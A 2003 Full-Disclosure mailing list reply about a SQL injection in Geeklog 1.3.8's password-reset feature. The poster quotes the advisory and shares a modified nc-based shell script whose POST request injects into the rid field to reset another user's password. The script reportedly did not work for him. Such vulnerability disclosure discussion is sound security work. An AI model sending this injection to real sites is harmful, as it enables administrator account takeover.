am 19.10.2003 18:21 Uhr schrieb Jouko Pynnonen unter [EMAIL PROTECTED]:
> ... > The exploit uses the "forgot password" feature introduced in Geeklog > 1.3.8. By constructing a certain kind of HTTP request, an attacker can > change any user's Geeklog password, including the administrator > password. This is because an SQL injection problem. In users.php we have > this kind of code (line about 750): > ... I tried out your exploit on a v1.3.8 Geeklog of mine, but the returned HTML says: "Your request for a new password has expired. Please try again below." Am I missing something? All I changed was to use HTTP/1.1 and to use parameters for host and path: ----- #!/bin/sh echo "POST $2users.php HTTP/1.1 Host: $1 Connection: close Content-length: 50 Content-type: application/x-www-form-urlencoded mode=setnewpwd&passwd=new&uid=2&rid=3'+or+uid='1& " | nc $1 80 ----- Thank you, Thomas _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
